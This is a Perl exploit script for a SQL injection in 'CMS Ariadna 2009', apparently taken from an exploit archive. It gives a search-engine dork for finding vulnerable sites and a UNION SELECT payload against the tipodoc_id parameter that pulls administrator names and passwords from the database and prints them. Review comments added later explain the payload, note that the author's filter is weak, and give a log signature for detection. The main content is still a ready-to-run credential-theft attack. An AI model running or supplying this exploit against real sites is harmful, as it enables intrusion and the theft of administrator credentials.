# Exploit Title : CMS Ariadna 2009 SQL Injection
|
|
# Date : 2010-04-19
|
|
# Author : Andrés Gómez
|
|
# Contact : gomezandres@adinet.com.uy
|
|
# Dork : "allinurl: detResolucion.php?tipodoc_id="
|
|
########################################################################
|
|
# Exploit in Perl starts on the next line:
|
|
|
|
use LWP::Simple;
|
|
|
|
########################################################################
|
|
# Malicious users may inject SQL queries into a vulnerable
|
|
# application to fool a user in order to gather data from them or see
|
|
# sensitive information.
|
|
########################################################################
|
|
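# Solution (the author's suggested input filter; it strips every character
# other than word characters, whitespace and single quotes, so quotes still
# pass through. Validating tipodoc_id as an integer and binding it as a query
# parameter addresses the injection at its source):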
|
|
# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
|
|
# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
|
|
########################################################################
|
|
# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
|
|
##########################[Andrés Gómez]#################################
|
|
|
|
# Proof-of-concept for the SQL injection described in the header: takes the
# base URL of the site as the first command-line argument, sends one GET
# request, and prints what comes back. With no argument it prints a usage
# banner and exits with status 1.
# NOTE(review): no `use strict` / `use warnings` is visible, and $sql, $final
# and $contenido are undeclared package globals.
my $target = $ARGV[0];
|
|
unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
|
|
Security-Pentest -- Andres Gomez\n\n";
|
|
print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
|
|
print "\nEjemplo Ejecucion = AriadnaCms.pl
|
|
http://www.sitio.extension/path/\n" ; exit 1; }
|
|
|
|
# Request path appended to the base URL. The tipodoc_id value carries
# "and 1=0 union select ...", which pulls adm_nombre and adm_clave from the
# administrador table. The hex literals decode to "security", ":" and
# "pentest" and act as markers that the regex further down looks for.
# Defender view: the parameter presumably reaches the query unparameterised
# (the server-side code is not shown here); requests whose tipodoc_id contains
# "union+select" or "concat(0x" are a usable signature in web-server logs.
$sql =
|
|
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
|
|
|
|
# get() is imported from LWP::Simple; it returns the response body, or undef
# when the request fails.
$final = $target.$sql;
|
|
$contenido = get($final);
|
|
|
|
print "\n\n[+] Pagina Web: $target\n\n";
|
|
# Success is judged purely by the two markers appearing in the response body;
# $1 and $2 are printed as the administrator name and password. Whether
# adm_clave is stored hashed or in clear text cannot be told from this script.
if ($contenido =~/security(.*):pentest(.*)/) {
|
|
print "[-] Datos extraidos con exito:\n\n";
|
|
print "[+] Usuario = $1\n";
|
|
print "[+] Password = $2\n";
|
|
} else {
|
|
print "[-] No se obtuvieron datos\n\n";
|
|
exit 1;
|
|
}
|
|
|
|
# The message mentions typing "exit", but no input is read; the script ends
# here. Every exit path, including this successful one, uses status 1.
print "\n[ñ] Escriba exit para salir de la aplicacion\n";
|
|
|
|
exit 1; |